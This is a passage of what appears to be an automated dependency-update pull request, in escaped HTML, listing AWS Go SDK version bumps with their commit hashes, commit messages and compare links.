releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.41.5 to 1.41.6\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8b6a97220901cccfd8a06f6f25aef65a967384c\"\u003e\u003ccode\u003ec8b6a97\u003c/code\u003e\u003c/a\u003e Release 2026-04-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4a05c2ba948715d305aff4519154abe2c4799246\"\u003e\u003ccode\u003e4a05c2b\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6cd4cc9201382be2638c8b4951b5d92de73c1161\"\u003e\u003ccode\u003e6cd4cc9\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3153bed494fb9e426640b30c7b91be0510b20362\"\u003e\u003ccode\u003e3153bed\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fe3cef6cc115a2915f5410c739dc73d51553d709\"\u003e\u003ccode\u003efe3cef6\u003c/code\u003e\u003c/a\u003e Make AccountIDEndpointRouting aware of bdd endpoints (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3387\"\u003e#3387\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.41.5...v1.41.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.19.14 to 1.19.15\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8b6a97220901cccfd8a06f6f25aef65a967384c\"\u003e\u003ccode\u003ec8b6a97\u003c/code\u003e\u003c/a\u003e Release 2026-04-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4a05c2ba948715d305aff4519154abe2c4799246\"\u003e\u003ccode\u003e4a05c2b\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6cd4cc9201382be2638c8b4951b5d92de73c1161\"\u003e\u003ccode\u003e6cd4cc9\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3153bed494fb9e426640b30c7b91be0510b20362\"\u003e\u003ccode\u003e3153bed\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fe3cef6cc115a2915f5410c739dc73d51553d709\"\u003e\u003ccode\u003efe3cef6\u003c/code\u003e\u003c/a\u003e Make AccountIDEndpointRouting aware of bdd endpoints (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3387\"\u003e#3387\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/credentials/v1.19.14...credentials/v1.19.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/cloudwatch` from 1.45.3 to 1.56.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5a964704cb2640ed57a74b9b37a53dcda7b6b7dd\"\u003e\u003ccode\u003e5a96470\u003c/code\u003e\u003c/a\u003e Release 2024-12-19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/653aa807b912e104f5e1e84e0510b4dffd76c751\"\u003e\u003ccode\u003e653aa80\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d02b239e896c5791e295c9a30a5281f56a8f7c39\"\u003e\u003ccode\u003ed02b239\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/698d709c21bc7922489aaba8c8207c9d7253c2fe\"\u003e\u003ccode\u003e698d709\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/885de40869f9bcee29ad11d60967aa0f1b571d46\"\u003e\u003ccode\u003e885de40\u003c/code\u003e\u003c/a\u003e Fix improper use of Printf-style functions (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2934\"\u003e#2934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/858298a55393392fb161c5bd0ae3b9c5251996bf\"\u003e\u003ccode\u003e858298a\u003c/code\u003e\u003c/a\u003e Release 2024-12-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f58264af808a255782999422056bccb06552dcbd\"\u003e\u003ccode\u003ef58264a\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/df31082d87044a000a1524dbb654651f32713e10\"\u003e\u003ccode\u003edf31082\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/346690ed8f5b974ab26532aa93d5fa92a58d3571\"\u003e\u003ccode\u003e346690e\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/45154546e09b48505c8798f7e5f3846ee1e0453a\"\u003e\u003ccode\u003e4515454\u003c/code\u003e\u003c/a\u003e Release 2024-12-17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/rds/v1.45.3...service/ssm/v1.56.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs` from 1.51.0 to 1.69.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/34ec0a43cbf69475be3bbbb6329c49687cc018df\"\u003e\u003ccode\u003e34ec0a4\u003c/code\u003e\u003c/a\u003e Release 2025-11-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/540441aa03ecb2b3b2b2f1eab1b71661b0ae2481\"\u003e\u003ccode\u003e540441a\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9869a2b39a8edb77fc98e0fc70d9bb059c6534a5\"\u003e\u003ccode\u003e9869a2b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a6b38c167b9ce07461c4f0af81be087055267121\"\u003e\u003ccode\u003ea6b38c1\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3953a0d499bf4a96a11e3377af3e5291831eed6c\"\u003e\u003ccode\u003e3953a0d\u003c/code\u003e\u003c/a\u003e add explicit message deser to all s3 errors (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3237\"\u003e#3237\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e7eec69683d04dbab33314fb6de43f8a43684163\"\u003e\u003ccode\u003ee7eec69\u003c/code\u003e\u003c/a\u003e Fix panic during auth scheme resolution due to region validation (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3235\"\u003e#3235\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d68b3a05c22b3bde751da6bb70e6fe01fd02407f\"\u003e\u003ccode\u003ed68b3a0\u003c/code\u003e\u003c/a\u003e Release 2025-11-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/292a19869df57271d51b382018591d71f09f72d3\"\u003e\u003ccode\u003e292a198\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dfeabc64ff80e2ee65951eb84d616072c8cd4b60\"\u003e\u003ccode\u003edfeabc6\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a7a1be5d2c14e9270e927654b63272fdfbee1aa6\"\u003e\u003ccode\u003ea7a1be5\u003c/code\u003e\u003c/a\u003e Release 2025-11-21\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.51.0...service/ecs/v1.69.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.225.2 to 1.299.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/18fee87f2c0615b0e5c3f28f1b95af810a9e77b5\"\u003e\u003ccode\u003e18fee87\u003c/code\u003e\u003c/a\u003e Release 2026-04-22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0ce157cd6b5427066ddb682a4967a3047230de4b\"\u003e\u003ccode\u003e0ce157c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/68cdb4a02d56b9d932fbfed22660cfa64e815ef6\"\u003e\u003ccode\u003e68cdb4a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f399972fb759f6ffd315963de511da785ef408e6\"\u003e\u003ccode\u003ef399972\u003c/code\u003e\u003c/a\u003e Bump Smithy from 1.67.0 to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3394\"\u003e#3394\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3c19a9b3eb17f48f6b9fc1cad644859d062775ad\"\u003e\u003ccode\u003e3c19a9b\u003c/code\u003e\u003c/a\u003e Release 2026-04-21\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1dfac3ec5a6c560e6fee389d0f1f364eb57ae616\"\u003e\u003ccode\u003e1dfac3e\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d842df6fcef5ecc94e2133cb1d96fac4926aadb4\"\u003e\u003ccode\u003ed842df6\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ffeb52a25097274529920d8f91b4ca27f7b636a9\"\u003e\u003ccode\u003effeb52a\u003c/code\u003e\u003c/a\u003e bump to latest smithy-go codegen (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3393\"\u003e#3393\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e839880e8d30897bd8a7684d83626d81f82c565a\"\u003e\u003ccode\u003ee839880\u003c/code\u003e\u003c/a\u003e Release 2026-04-20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4c898c88577f4102793d3e15de05ad3b5b1e2ef5\"\u003e\u003ccode\u003e4c898c8\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.225.2...service/ec2/v1.299.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/oam` from 1.18.3 to 1.23.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/54aed732316b5162e5c4382a1f2d3891175d0254\"\u003e\u003ccode\u003e54aed73\u003c/code\u003e\u003c/a\u003e Release 2025-02-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/082781faee876f9d612fa7c113b4304a29766b14\"\u003e\u003ccode\u003e082781f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3ed185b604684a86547e679154975f1914f97312\"\u003e\u003ccode\u003e3ed185b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/03da7378d668622cd880ec741d57e93cc370efa1\"\u003e\u003ccode\u003e03da737\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8a8ccb619ffbfe00e99a83e99729b948f20be29\"\u003e\u003ccode\u003ec8a8ccb\u003c/code\u003e\u003c/a\u003e Bump go version to 1.22 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3010\"\u003e#3010\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8b7c7bf6d9a1c63d0c5262724ae8a15a44e366a6\"\u003e\u003ccode\u003e8b7c7bf\u003c/code\u003e\u003c/a\u003e fix missing AccountIDEndpointMode binding (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3013\"\u003e#3013\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90f9d1081a37acaf792ccda5bfb07e2ee7590a9e\"\u003e\u003ccode\u003e90f9d10\u003c/code\u003e\u003c/a\u003e Release 2025-02-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/40dd351c61c016749a3f4105cca0c965e7c66d7b\"\u003e\u003ccode\u003e40dd351\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/06352dfafe9067da1956229d6925efed328d5ff6\"\u003e\u003ccode\u003e06352df\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/833566b553122ebd5bfa1237ee7c905a8db0d687\"\u003e\u003ccode\u003e833566b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.18.3...service/dax/v1.23.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi` from 1.26.6 to 1.31.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/67db6904b816b95073883b7ad378384c4839b28c\"\u003e\u003ccode\u003e67db690\u003c/code\u003e\u003c/a\u003e Release 2025-09-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/32ee1b5d75fc303c0626a6f5e769f4e08cc491a8\"\u003e\u003ccode\u003e32ee1b5\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0b431223309a815cffc048072556aa651ee1455f\"\u003e\u003ccode\u003e0b43122\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/44786d920f3627b73a99e81c7b6399dbfcf7ab42\"\u003e\u003ccode\u003e44786d9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c98edb73809256823906d7e307ecf3c9abc16700\"\u003e\u003ccode\u003ec98edb7\u003c/code\u003e\u003c/a\u003e update internal endpts comment that was wrong (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3194\"\u003e#3194\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/88da3c8c5569dece0e99802dab638faa047a0db0\"\u003e\u003ccode\u003e88da3c8\u003c/code\u003e\u003c/a\u003e Release 2025-09-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/74a74fc179f8bbd879383cc75fa29a1937266dcc\"\u003e\u003ccode\u003e74a74fc\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5e6f7ae6139ca69044bb706664b4dbdc31227a32\"\u003e\u003ccode\u003e5e6f7ae\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0e722ab42ff6bc6bb810c2937b8e1b41937e17c3\"\u003e\u003ccode\u003e0e722ab\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/41a7d004b9ff794f6007d30168afc825031f2c61\"\u003e\u003ccode\u003e41a7d00\u003c/code\u003e\u003c/a\u003e Release 2025-09-24\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.31.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/s3` from 1.89.2 to 1.100.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/18fee87f2c0615b0e5c3f28f1b95af810a9e77b5\"\u003e\u003ccode\u003e18fee87\u003c/code\u003e\u003c/a\u003e Release 2026-04-22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0ce157cd6b5427066ddb682a4967a3047230de4b\"\u003e\u003ccode\u003e0ce157c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/68cdb4a02d56b9d932fbfed22660cfa64e815ef6\"\u003e\u003ccode\u003e68cdb4a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f399972fb759f6ffd315963de511da785ef408e6\"\u003e\u003ccode\u003ef399972\u003c/code\u003e\u003c/a\u003e Bump Smithy from 1.67.0 to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3394\"\u003e#3394\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3c19a9b3eb17f48f6b9fc1cad644859d062775ad\"\u003e\u003ccode\u003e3c19a9b\u003c/code\u003e\u003c/a\u003e Release 2026-04-21\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1dfac3ec5a6c560e6fee389d0f1f364eb57ae616\"\u003e\u003ccode\u003e1dfac3e\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d842df6fcef5ecc94e2133cb1d96fac4926aadb4\"\u003e\u003ccode\u003ed842df6\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ffeb52a25097274529920d8f91b4ca27f7b636a9\"\u003e\u003ccode\u003effeb52a\u003c/code\u003e\u003c/a\u003e bump to latest smithy-go codegen (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3393\"\u003e#3393\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e839880e8d30897bd8a7684d83626d81f82c565a\"\u003e\u003ccode\u003ee839880\u003c/code\u003e\u003c/a\u003e Release 2026-04-20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4c898c88577f4102793d3e15de05ad3b5b1e2ef5\"\u003e\u003ccode\u003e4c898c8\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.89.2...service/s3/v1.100.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/secretsmanager` from 1.40.1 to 1.41.6\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9bc9c51d733fd437a60a8710531477ca0347dcc4\"\u003e\u003ccode\u003e9bc9c51\u003c/code\u003e\u003c/a\u003e Release 2026-04-17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca 